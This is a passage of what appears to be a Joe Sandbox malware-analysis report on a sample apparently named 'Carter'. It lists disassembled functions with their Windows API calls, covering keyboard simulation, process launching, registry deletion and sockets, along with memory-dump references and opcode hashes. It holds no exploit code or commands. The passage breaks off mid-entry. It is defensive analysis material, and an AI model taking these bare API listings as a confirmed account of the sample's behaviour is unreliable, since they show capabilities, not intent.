Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00AE76CF
EnterCriticalSection.KERNEL32(?), ref: 00AE76EB
_memmove.LIBCMT ref: 00AE7739
_memmove.LIBCMT ref: 00AE7756
LeaveCriticalSection.KERNEL32(?), ref: 00AE7765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00AE777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00AE7799

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 7c2a62df2035efb46fcbfbec0c8b7a0117a70d965d64506763429f07c092ec44
Instruction ID: 3bf67c0d34d6f6479d4db5ce4b55592956af568e5cf00c41f9fef05cc2165737
Opcode Fuzzy Hash: 7c2a62df2035efb46fcbfbec0c8b7a0117a70d965d64506763429f07c092ec44
Instruction Fuzzy Hash: B2317031904109EBDB10EF55DD85EAEB7B8EF45310F1480A5FD04AB296DB709A50DBA0

Function 00B067F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B06810
GetDC.USER32(00000000), ref: 00B06818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B06823
ReleaseDC.USER32(00000000,00000000), ref: 00B0682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B0686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B0687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B0964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00B068B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B068D6

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 95e64ef3e6d13a8adea04e6fe76b17d24e84fbed7e78438bdcb79920428f4df2
Instruction ID: e5159c08e437ece4382a43e98e89b1cb483fecbe86cf945c7649b11870b0d12f
Opcode Fuzzy Hash: 95e64ef3e6d13a8adea04e6fe76b17d24e84fbed7e78438bdcb79920428f4df2
Instruction Fuzzy Hash: 9D316D72111214BFEB119F50DC4AFEA3FADEB49761F048055FE089A291DAB59C91CB70

Function 00ADC748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00ADC75D
_memcmp.LIBCMT ref: 00ADC77F
_memcmp.LIBCMT ref: 00ADC797
_memcmp.LIBCMT ref: 00ADC7AA
_memcmp.LIBCMT ref: 00ADC7C4
_memcmp.LIBCMT ref: 00ADC7D7
_memcmp.LIBCMT ref: 00ADC7EF
_memcmp.LIBCMT ref: 00ADC80A

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: b3a1438c5efa031ca217f2d57e6f4286070f8be7144a735a27f04a009277b87d
Instruction ID: 957bb56d10170c1cac9a48ee0cd38c1672726e4e3e55eb0c6012eb78222b62e6
Opcode Fuzzy Hash: b3a1438c5efa031ca217f2d57e6f4286070f8be7144a735a27f04a009277b87d
Instruction Fuzzy Hash: 0F219572A452077ADA0476119E82FEF37AC9E25BA4F844026FD07E7382F710DE11CAE1

Function 00AEF166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC

Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D

_wcstok.LIBCMT ref: 00AEF2D7
_wcscpy.LIBCMT ref: 00AEF366
_memset.LIBCMT ref: 00AEF399

Strings

X, xrefs: 00AEF3D6

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 644a7855fd8e927694ab25af6000970ac039a2bffd9b1e90327413d77330c668
Instruction ID: 5afa96b13c3df5ceac7b70ed6da994eae5d0774d9b0659143b51b44efa15fede
Opcode Fuzzy Hash: 644a7855fd8e927694ab25af6000970ac039a2bffd9b1e90327413d77330c668
Instruction Fuzzy Hash: 42C18E716043819FCB14EF65C981A5EB7E4FF85354F10492DF8999B2A2EB30EC45CB92

Function 00AF71EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00AF72EB
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AF730C
WSAGetLastError.WSOCK32(00000000), ref: 00AF731F
htons.WSOCK32(?,?,?,00000000,?), ref: 00AF73D5
inet_ntoa.WSOCK32(?), ref: 00AF7392

Part of subcall function 00ADB4EA: _strlen.LIBCMT ref: 00ADB4F4
Part of subcall function 00ADB4EA: _memmove.LIBCMT ref: 00ADB516

_strlen.LIBCMT ref: 00AF742F
_memmove.LIBCMT ref: 00AF7498

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: ddeb6334e474a349d204e9b9439b4e2268962c206db49b7029cb215a504476a9
Instruction ID: d45b2b325cad129298305a29692576b714c812b917817812c0b3bb2f86cd9905
Opcode Fuzzy Hash: ddeb6334e474a349d204e9b9439b4e2268962c206db49b7029cb215a504476a9
Instruction Fuzzy Hash: 7981C271608205AFD710EB64CD81E6FB7F8AF88714F10451DFA569B292EB70DD41CB91

Function 00A81800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 133ced0a70d2226a8065cc1bec4843ce614177a38e8162c5824fd45b982a6be0
Instruction ID: 094cccb365fe8f95e8811e0b73512f6aa0108fc66aa31d2350ecfbf7abd0b3e1
Opcode Fuzzy Hash: 133ced0a70d2226a8065cc1bec4843ce614177a38e8162c5824fd45b982a6be0
Instruction Fuzzy Hash: 81713A70900109EFDB14AF98CC89AEEBB79FF86314F148159F915AB251C774AA52CFA0

Function 00B0B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01755A48), ref: 00B0BA5D
IsWindowEnabled.USER32(01755A48), ref: 00B0BA69
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00B0BB4D
SendMessageW.USER32(01755A48,000000B0,?,?), ref: 00B0BB84
IsDlgButtonChecked.USER32(?,?), ref: 00B0BBC1
GetWindowLongW.USER32(01755A48,000000EC), ref: 00B0BBE3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B0BBFB

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 3c9b6bf54d13fed9768dd51d5268253b0e5dc086b443155a61ce16e62240101e
Instruction ID: dca0ec57f2914aa7e3c9da45bc7f42d5ffc65421e54befcd167637ae85a8555d
Opcode Fuzzy Hash: 3c9b6bf54d13fed9768dd51d5268253b0e5dc086b443155a61ce16e62240101e
Instruction Fuzzy Hash: E9718A34A04204AFEB259F54C8D4FBABFE9EF49310F144499E986972A1CF31AD51DB60

Function 00AFFB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AFFB31
_memset.LIBCMT ref: 00AFFBFA
ShellExecuteExW.SHELL32(?), ref: 00AFFC3F

Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC

Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D

GetProcessId.KERNEL32(00000000), ref: 00AFFCB6
CloseHandle.KERNEL32(00000000), ref: 00AFFCE5

Strings

@, xrefs: 00AFFC0E

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: d596e5244696527b64718365ed00457efe2620db137f6e9499567eedbc8ce6ce
Instruction ID: 7d55c32ec960aad94ba153f7678d7674c2fd6cdcf375455589b086a46dfbb608
Opcode Fuzzy Hash: d596e5244696527b64718365ed00457efe2620db137f6e9499567eedbc8ce6ce
Instruction Fuzzy Hash: 9761BE75A00619DFCB14EFA4C5919AEB7F4FF48310F148569E916AB351DB30AD42CB90

Function 00AE174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00AE178B
GetKeyboardState.USER32(?), ref: 00AE17A0
SetKeyboardState.USER32(?), ref: 00AE1801
PostMessageW.USER32(?,00000101,00000010,?), ref: 00AE182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 00AE184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 00AE1894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AE18B7

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 9a0a24f6b9f4c303d799c208671b3b69e6621b94cd0f04bf83045a9479727de7
Instruction ID: 82ee237d462e5f9c117b7dd50a39d8cc1a502e0039d28e3e07e8c2d626395c81
Opcode Fuzzy Hash: 9a0a24f6b9f4c303d799c208671b3b69e6621b94cd0f04bf83045a9479727de7
Instruction Fuzzy Hash: 5851C3B0A187E53EFB364326CC55BBA7EE96B06700F088589E0D9468C3D6F89CD4DB50

Function 00AE1565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00AE15A4
GetKeyboardState.USER32(?), ref: 00AE15B9
SetKeyboardState.USER32(?), ref: 00AE161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AE1646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AE1663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AE16A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AE16C8

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a170a9779a71585a42df9f7fb55414ea3857ba3f189fd33091bb17faad572855
Instruction ID: d1e6e92d03ea65ae16656274c05b6e019b4381e2969852d15b7fb6b8f93f4b78
Opcode Fuzzy Hash: a170a9779a71585a42df9f7fb55414ea3857ba3f189fd33091bb17faad572855
Instruction Fuzzy Hash: 7351E7B06047E53DFB328726CC55BBABEA96B05300F0C8589E1D9578C2D6B4EC98E761

Function 00AE5BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00AE5BC5
_wcsncpy.LIBCMT ref: 00AE5BFA
_wcsncpy.LIBCMT ref: 00AE5C2C
_wcsncpy.LIBCMT ref: 00AE5C5F
_wcsncpy.LIBCMT ref: 00AE5CA1
_wcsncpy.LIBCMT ref: 00AE5CDB
_wcsncpy.LIBCMT ref: 00AE5D0A

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: d4484eae971f9d47439048779801d3b274a30f6c3f6fef9c30caaa00493da6f4
Instruction ID: 5ecdc1792afdb0b0ad334896bdd4bc471586927c894a9e02b3898816d310f502
Opcode Fuzzy Hash: d4484eae971f9d47439048779801d3b274a30f6c3f6fef9c30caaa00493da6f4
Instruction Fuzzy Hash: 3841D366C2065875CF51FBB5CC86ACFB7B8AF06310F508856F509E3161E734A359C3A5

Function 00AE3B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BE0

Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BF9

lstrcmpiW.KERNEL32(?,?), ref: 00AE3BAA
_wcscmp.LIBCMT ref: 00AE3BC6
MoveFileW.KERNEL32(?,?), ref: 00AE3BDE
_wcscat.LIBCMT ref: 00AE3C26
SHFileOperationW.SHELL32(?), ref: 00AE3C92

Strings

\*.*, xrefs: 00AE3C20

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: a91f74432880cc379a2ed7bb8f3d47bd595dd97d253584667238e9d3b190c608
Instruction ID: 126a767007aa4ef79743f36ac13fc95b85d07c8bc67a1ac0346c90293efd02bf
Opcode Fuzzy Hash: a91f74432880cc379a2ed7bb8f3d47bd595dd97d253584667238e9d3b190c608
Instruction Fuzzy Hash: 72418F7250C3849ACB52EF65C585ADFB7ECAF89340F50092EF48AC7191EB34D688C752

Function 00B078B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B078CF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B07976
IsMenu.USER32(?), ref: 00B0798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B079D6
DrawMenuBar.USER32 ref: 00B079E9

Strings

0, xrefs: 00B078C3

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 3ee29b26f73b4948beff5d21c846ceeeb4d1e520bb34f84bb300c263659d1a20
Instruction ID: d738b440c664465b0d2ce0818ac95067d8970cc8e6318d280d534dbc6606a22e
Opcode Fuzzy Hash: 3ee29b26f73b4948beff5d21c846ceeeb4d1e520bb34f84bb300c263659d1a20
Instruction Fuzzy Hash: 2B414975A44209EFDB10DF94D884EAABBFAFB05310F0481A9E95597290CB70AD50CFA0

Function 00B01602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B01631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0165B
FreeLibrary.KERNEL32(00000000), ref: 00B01712

Part of subcall function 00B01602: RegCloseKey.ADVAPI32(?), ref: 00B01678
Part of subcall function 00B01602: FreeLibrary.KERNEL32(?), ref: 00B016CA
Part of subcall function 00B01602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B016ED

RegDeleteKeyW.ADVAPI32(?,?), ref: 00B016B5

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 91b949e569a5935aa1b8e92470421d241d3417ac7d7ecf85b94a461f9c3c4920
Instruction ID: 98d70bee05690573226c61b7a28051d8e8029afe79dd37063c728013d617357a
Opcode Fuzzy Hash: 91b949e569a5935aa1b8e92470421d241d3417ac7d7ecf85b94a461f9c3c4920
Instruction Fuzzy Hash: B7313CB191010DFFDB199F94DC89AFEBBBCEF08300F4045A9F501A2190EA749E859AA0

Function 00B068F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B06911
GetWindowLongW.USER32(01755A48,000000F0), ref: 00B06944
GetWindowLongW.USER32(01755A48,000000F0), ref: 00B06979
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B069AB
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B069D5
GetWindowLongW.USER32(?,000000F0), ref: 00B069E6
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B06A00

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: b3a99c7696e33eacb9a33f1b185668f3fa8ce0364fd4d8ae8875f2c1edf10b62
Instruction ID: df985b2d245e2871dba1dbcb3ddb72bd54c058426e39806a46ef632dd293b302
Opcode Fuzzy Hash: b3a99c7696e33eacb9a33f1b185668f3fa8ce0364fd4d8ae8875f2c1edf10b62
Instruction Fuzzy Hash: BE313234644255AFEB20DF59DC88F643BE1FB4A350F2841A4F5048B6F1CB72ADA0CB91

Function 00ADE287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE2F0
SysAllocString.OLEAUT32(00000000), ref: 00ADE2F3
SysAllocString.OLEAUT32(?), ref: 00ADE311
SysFreeString.OLEAUT32(?), ref: 00ADE31A
StringFromGUID2.OLE32(?,?,00000028), ref: 00ADE33F
SysAllocString.OLEAUT32(?), ref: 00ADE34D

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: dfe34934b12ddbeddd4d2db036a8e41350adffac2c495240d16c706c008dcefd
Instruction ID: 8e70a18063dcd7df48972f304eba26b2f8c1be48744780668bbe2e29d070e0c7
Opcode Fuzzy Hash: dfe34934b12ddbeddd4d2db036a8e41350adffac2c495240d16c706c008dcefd
Instruction Fuzzy Hash: 96212176614219AF9F10EFA8DC88DBA77BCEB09360B448126FA15DF350DA70ED858760

Function 00AF685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AF84A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00AF68B1
